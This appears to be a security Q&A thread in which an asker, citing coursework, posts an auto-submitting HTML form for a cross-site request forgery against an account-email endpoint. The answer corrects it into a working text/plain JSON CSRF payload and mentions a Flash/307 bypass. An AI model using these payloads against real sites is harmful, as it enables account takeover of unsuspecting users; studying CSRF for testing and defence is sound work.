2

So I'm testing this site for coursework and I think it might be vulnerable CSRF however when I try to make a post request I get a validation error which says "locale" is required despite me specifying it in the request. Here's the form source code.

<html>
<head>
</head>
<body>
    <form action="http://account.testbank.com/api/account/v1/user/email" method="post" enctype='applicatiom/json'>
        <input name='{"email":"testuser@gmail.com" ,"locale": "en"}'>
        <input type="hidden" name="locale" id="locale" value="en-US">
        <script> document.forms[0].submit()</script>
    </form>     
</body>
</html>

What am I doing wrong?

EdOverflow
  • 1,246
  • 8
  • 21
光量子
  • 21
  • 1

1 Answers1

1

I see you want to send a JSON format; a HTML form builds a POST request taking the name and value attributes in the following way:

name1=value1&name2=value2

So, your POST request could look like this:

{"email":"testuser@gmail.com" ,"locale": "en"}=&locale=en-US

As you can see, it's an incorrect JSON format and the application could generate an error. Also, you are using the value applicatiom/json for the attribute enctype to specify the content-type header, but this could encode the body of POST request, something like this:

%7B%22email%22%3A%22testuser%40gmail.com%22%20,%22locale%22%3A%20%22en%22%7D=&locale=en-US

You have another incorrect JSON format.

So, if the application doesn't validate content-type, you could use text/plain instead of applicatiom/json and change your form in the following way:

<input name='{"email":"testuser@gmail.com" ,"locale": "en' value='"}'>

The POST request would be the following:

{"email":"testuser@gmail.com" ,"locale": "en="}

Now, you have a correct JSON format, the unique problem might be the character =.

If the application validates content-type, there is a technique about a Flash script and a HTTP Response 307, I share you a link about this technique.

CSRF Flash 307

I hope this information helps you.

Good luck.

hmrojas.p
  • 1,049
  • 1
  • 8
  • 16